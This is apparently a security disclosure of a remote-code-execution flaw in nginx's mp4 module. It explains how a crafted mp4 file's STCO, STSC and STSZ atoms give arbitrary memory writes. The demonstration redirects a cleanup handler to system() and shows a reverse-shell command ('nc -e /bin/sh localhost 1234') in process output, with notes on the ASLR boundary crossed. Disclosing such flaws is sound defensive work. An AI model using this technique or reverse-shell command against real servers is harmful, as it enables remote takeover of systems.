I have found a possible security issue in nginx's mp4 module which
allows remote code execution. By processing a crafted mp4 file, an
attacker can cause arbitrary values to be written to arbitrary memory
locations.

The issue is in the updating of the STCO atom. On line 2641 (of
src/http/module/ngx_http_mp4_module.c), data->pos is moved by a scaled
amount of trak->start_chunk, which is in turn set by the updating of
the STSC atom (line 2382). This trak->start_chunk value is
user-controlled, but is not checked when moving the data->pos pointer.
After, the value trak->chunk_samples_size is added to the value at the
pointer, and is written back out. trak->chunk_samples_size is
user-controlled too (updating of STSZ atom), so both location and
value are user-controlled deltas from their original values.

This can be exploited, as the attached file demonstrates (which
creates a connectback shell to localhost:1234). It does this by
adjusting the value of the pool file close handler
(ngx_pool_cleanup_file) to point to system in libc, and the data it is
called with to point to a command line string:

$ nc -l -p 1234 &
[1] 6737
$ /usr/local/nginx/sbin/nginx &
[2] 6738
$ curl -m 1 localhost:8080/nginx.mp4?start=0
curl: (28) Operation timed out after 1002 milliseconds with 0 bytes received
$ fg 1
nc -l -p 1234
ps f
  PID TTY      STAT   TIME COMMAND
 6346 pts/4    Ss     0:01 /bin/bash
 6737 pts/4    S+     0:00  \_ nc -l -p 1234
 6738 pts/4    S      0:00  \_ /usr/local/nginx/sbin/nginx
 6740 pts/4    S      0:00      \_ sh -c nc -e /bin/sh localhost 1234
 6741 pts/4    S      0:00          \_ sh
 6742 pts/4    R      0:00              \_ ps f

Since the original call to ngx_pool_cleanup_file is in nginx's .text
section whereas system is in libc's, an ASLR boundary is crossed,
however none of the other locations/values that are updated do.

Location delta #1: STCO data buffer (request pool) ->
ngx_pool_cleanup_t::handler (request pool)
Value delta #1: ngx_pool_cleanup_file (nginx .text) -> system (libc
.text)  <-- ASLR crossed
Location delta #2: STCO data buffer (request pool) ->
ngx_pool_cleanup_t::data (request pool)
Value delta #2: ngx_pool_cleanup_file_t * (request pool) -> command
line (request pool)

A more skilled attacker may be able to craft a file that doesn't cross
any ASLR boundaries, and hence make it bypass ASLR protections.